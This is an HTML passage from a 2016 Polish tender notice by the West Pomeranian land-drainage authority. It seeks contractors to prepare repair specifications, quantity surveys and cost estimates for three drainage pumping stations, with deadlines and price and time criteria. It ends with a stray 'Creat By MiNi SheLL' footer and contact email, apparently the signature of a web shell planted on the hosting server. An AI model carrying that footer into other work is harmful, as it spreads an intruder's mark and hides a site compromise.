<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych w Szczecinie, 71-421 Szczecin, ul. Wyzwolenia 105 tel. 91 44 05 100, faks 91 44 05 101, e-mail: sekretariat@zzmiuw.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2016 godzina 12:00, miejsce: Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych w Szczecinie, 71-421 Szczecin, ul. Wyzwolenia 105 w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie Opisu Przedmiotu Zamówienia (OPZ) - Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego
Zadanie nr 1 pompownia melioracyjna Niechorze-Skalno T/O Gryfice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce realizacji: Stacja pomp Niechorze-Skalno, miejscowość Niechorze, gmina Rewal. Dojazd do miejscowości Niechorze drogą gruntową o długości ok. 1,4 km.
Przedmiotem zamówienia jest Opracowanie Opisu Przedmiotu Zamówienia (OPZ) - Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego Zadanie nr 1 pompownia melioracyjna Niechorze-Skalno T/O Gryfice.

OPZ należy wykonać w formie papierowej - 4 egzemplarzy, przedmiar oraz kosztorys inwestor-ski - 1 egzemplarz oraz w formie elektronicznej (część opisowa - pliki doc., docx., kosztorysy i przedmiary - pliki ath. i PDF., rysunki - pliki PDF., dwg.) na płycie CD/DVD lub pendrive 2 sztuki. (dla wszystkich użytych programów w których zostały zapisane pliki wymagane jest po-siadanie licencji na użytkowanie).

1.4. Uszczegółowienie zakresu i terminów realizacji.

OPZ będzie służył jako załącznik do kolejnego SIWZ na wykonanie przedmiotowych prac i ma być materiałem pomocniczym:
-  dla Zamawiającego celem ustalenia wartości Zamówienia
- dla potencjalnych Wykonawców celem ustalenia planowanych koszów prac projektowych i robót naprawczych w trakcie przygotowania oferty
- dla Zamawiającego i Wykonawcy celem jednoznacznego ustalenia zakresu robót, wymagań technicznych i jakościowych 
Opracowanie powinno zawierać:
a)	Inwentaryzacje stanu istniejącego - część opisowa i rysunkowa oraz atest-raport nurkowy.
b)	Opis rozwiązań związanych z naprawą części budowlanej i hydraulicznej przepompowni 
i przystosowaniem do montażu agregatów pompowych i zatapialnych.
c)	Opis rozwiązań związanych z doborem lub naprawą agregatów pompowych.
d)	Opis rozwiązań związanych z naprawą układu zasilania i sterowania pracą agregatów.
e)	Część rysunkowa. 
f)	Przedmiar robót.
g)	Kosztorys inwestorski.
W tym:
1)	Część opisową obejmującą:
a)	opis zaproponowanych rozwiązań,
b)	opis techniczny wymogów dotyczących funkcjonowania zaproponowanych rozwiązań 
z uwzględnieniem wskazanych w opisie przepisów.
c)	zaproponowane rozwiązania powinny uwzględniać wymogi określone w operatach wodno prawnych na szczególne korzystanie z wód dla pompowni melioracyjnych
2)	Część rysunkową w postaci:
a)	rysunków koncepcyjnych z uwzględnieniem proponowanych do wykorzystania mate-riałów
 i rozwiązań.

Etapowanie prac:
- Etap I: sporządzenie w formie graficznej i opisowej inwentaryzacji obiektów, sporządzenie ra-portu nurkowego wraz z pomiarami konstrukcji wlotowych i wylotowych obiektów. Za-proponowanie zakresu i technologii robót naprawczych. - do 30 dni od daty podpisania umowy.
- Etap II: po zatwierdzeniu zaproponowanego zakresu robót naprawczych w Etapie I przez Za-mawiającego, Wykonawca wykona OPZ wraz z wymaganymi opracowaniami. - do 60 dni.
Szczegółowy zakres jaki winien zawierać OPZ dla poszczególnych zadań  przedstawiono w zał. 6.1 do SIWZ. 
Operaty wodnoprawne na szczególne korzystanie z wód dla pompowni melioracyjnych objętych przedmiotem zamówienia  stanowią załącznik nr 7.1  do niniejszego SIWZ.
Zakres opracowania oraz dodatkowe obowiązki Wykonawcy określa wzór umowy stanowiący załącznik nr 3 do niniejszego SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin realizacji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie Opisu Przedmiotu Zamówienia (OPZ) - Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego: Zadanie nr 2 pompownia melioracyjna Stepnica I T/O Goleniów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce realizacji: Stacja pomp Stepnica I, miejscowość Stepnica gmina Stepnica. Dojazd do miejscowości Stepnica ul. Łąkową w kierunku rzeki Gowienicy.
Przedmiotem zamówienia jest Opracowanie Opisu Przedmiotu Zamówienia (OPZ) - Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego:
Zadanie nr 2 pompownia melioracyjna Stepnica I T/O Goleniów.
OPZ należy wykonać w formie papierowej - 4 egzemplarzy, przedmiar oraz kosztorys inwestor-ski - 1 egzemplarz oraz w formie elektronicznej (część opisowa - pliki doc., docx., kosztorysy i przedmiary - pliki ath. i PDF., rysunki - pliki PDF., dwg.) na płycie CD/DVD lub pendrive 2 sztuki. (dla wszystkich użytych programów w których zostały zapisane pliki wymagane jest po-siadanie licencji na użytkowanie).

1.4. Uszczegółowienie zakresu i terminów realizacji.

OPZ będzie służył jako załącznik do kolejnego SIWZ na wykonanie przedmiotowych prac i ma być materiałem pomocniczym:
-  dla Zamawiającego celem ustalenia wartości Zamówienia
- dla potencjalnych Wykonawców celem ustalenia planowanych koszów prac projektowych i robót naprawczych w trakcie przygotowania oferty
- dla Zamawiającego i Wykonawcy celem jednoznacznego ustalenia zakresu robót, wymagań technicznych i jakościowych 
Opracowanie powinno zawierać:
a)	Inwentaryzacje stanu istniejącego - część opisowa i rysunkowa oraz atest-raport nurkowy.
b)	Opis rozwiązań związanych z naprawą części budowlanej i hydraulicznej przepompowni 
i przystosowaniem do montażu agregatów pompowych i zatapialnych.
c)	Opis rozwiązań związanych z doborem lub naprawą agregatów pompowych.
d)	Opis rozwiązań związanych z naprawą układu zasilania i sterowania pracą agregatów.
e)	Część rysunkowa. 
f)	Przedmiar robót.
g)	Kosztorys inwestorski.
W tym:
1)	Część opisową obejmującą:
a)	opis zaproponowanych rozwiązań,
b)	opis techniczny wymogów dotyczących funkcjonowania zaproponowanych rozwiązań 
z uwzględnieniem wskazanych w opisie przepisów.
c)	zaproponowane rozwiązania powinny uwzględniać wymogi określone w operatach wodno prawnych na szczególne korzystanie z wód dla pompowni melioracyjnych
2)	Część rysunkową w postaci:
a)	rysunków koncepcyjnych z uwzględnieniem proponowanych do wykorzystania mate-riałów
 i rozwiązań.

Etapowanie prac:
- Etap I: sporządzenie w formie graficznej i opisowej inwentaryzacji obiektów, sporządzenie ra-portu nurkowego wraz z pomiarami konstrukcji wlotowych i wylotowych obiektów. Za-proponowanie zakresu i technologii robót naprawczych. - do 30 dni od daty podpisania umowy.
- Etap II: po zatwierdzeniu zaproponowanego zakresu robót naprawczych w Etapie I przez Za-mawiającego, Wykonawca wykona OPZ wraz z wymaganymi opracowaniami. - do 60 dni.
Szczegółowy zakres jaki winien zawierać OPZ dla poszczególnych zadań  przedstawiono w zał. 6.2 do SIWZ. 
Operaty wodnoprawne na szczególne korzystanie z wód dla pompowni melioracyjnych objętych przedmiotem zamówienia  stanowią załącznik nr 7.2 do niniejszego SIWZ.
Zakres opracowania oraz dodatkowe obowiązki Wykonawcy określa wzór umowy stanowiący załącznik nr  3 do niniejszego SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin realizacji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie Opisu Przedmiotu Zamówienia (OPZ) - Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego:
Zadanie nr 3 pompownia melioracyjna Żarnowo T/O Goleniów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.2. Miejsce realizacji:
Stacja pomp Żarnowo, obręb Czarnocin, gmina Stepnica. Dojazd do miejscowości Żarnowo i droga płytowa ok 2 km.
1.3. Zakres przedmiotu zamówienia.
Przedmiotem zamówienia jest Opracowanie Opisu Przedmiotu Zamówienia (OPZ) - Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego:
Zadanie nr 3 pompownia melioracyjna Żarnowo T/O Goleniów.
OPZ należy wykonać w formie papierowej - 4 egzemplarzy, przedmiar oraz kosztorys inwestor-ski - 1 egzemplarz oraz w formie elektronicznej (część opisowa - pliki doc., docx., kosztorysy i przedmiary - pliki ath. i PDF., rysunki - pliki PDF., dwg.) na płycie CD/DVD lub pendrive 2 sztuki. (dla wszystkich użytych programów w których zostały zapisane pliki wymagane jest po-siadanie licencji na użytkowanie).

1.4. Uszczegółowienie zakresu i terminów realizacji.

OPZ będzie służył jako załącznik do kolejnego SIWZ na wykonanie przedmiotowych prac i ma być materiałem pomocniczym:
-  dla Zamawiającego celem ustalenia wartości Zamówienia
- dla potencjalnych Wykonawców celem ustalenia planowanych koszów prac projektowych i robót naprawczych w trakcie przygotowania oferty
- dla Zamawiającego i Wykonawcy celem jednoznacznego ustalenia zakresu robót, wymagań technicznych i jakościowych 
Opracowanie powinno zawierać:
a)	Inwentaryzacje stanu istniejącego - część opisowa i rysunkowa oraz atest-raport nurkowy.
b)	Opis rozwiązań związanych z naprawą części budowlanej i hydraulicznej przepompowni 
i przystosowaniem do montażu agregatów pompowych i zatapialnych.
c)	Opis rozwiązań związanych z doborem lub naprawą agregatów pompowych.
d)	Opis rozwiązań związanych z naprawą układu zasilania i sterowania pracą agregatów.
e)	Część rysunkowa. 
f)	Przedmiar robót.
g)	Kosztorys inwestorski.
W tym:
1)	Część opisową obejmującą:
a)	opis zaproponowanych rozwiązań,
b)	opis techniczny wymogów dotyczących funkcjonowania zaproponowanych rozwiązań 
z uwzględnieniem wskazanych w opisie przepisów.
c)	zaproponowane rozwiązania powinny uwzględniać wymogi określone w operatach wodno prawnych na szczególne korzystanie z wód dla pompowni melioracyjnych
2)	Część rysunkową w postaci:
a)	rysunków koncepcyjnych z uwzględnieniem proponowanych do wykorzystania mate-riałów
 i rozwiązań.
Etapowanie prac:
- Etap I: sporządzenie w formie graficznej i opisowej inwentaryzacji obiektów, sporządzenie ra-portu nurkowego wraz z pomiarami konstrukcji wlotowych i wylotowych obiektów. Za-proponowanie zakresu i technologii robót naprawczych. - do 30 dni od daty podpisania umowy.
- Etap II: po zatwierdzeniu zaproponowanego zakresu robót naprawczych w Etapie I przez Za-mawiającego, Wykonawca wykona OPZ wraz z wymaganymi opracowaniami. - do 60 dni.
Szczegółowy zakres jaki winien zawierać OPZ dla poszczególnych zadań  przedstawiono w zał. 6.3 do SIWZ. 
Operaty wodnoprawne na szczególne korzystanie z wód dla pompowni melioracyjnych objętych przedmiotem zamówienia  stanowią załącznik 7.3 do niniejszego SIWZ.
Zakres opracowania oraz dodatkowe obowiązki Wykonawcy określa wzór umowy stanowiący załącznik nr  3 do niniejszego SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin realizacji - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com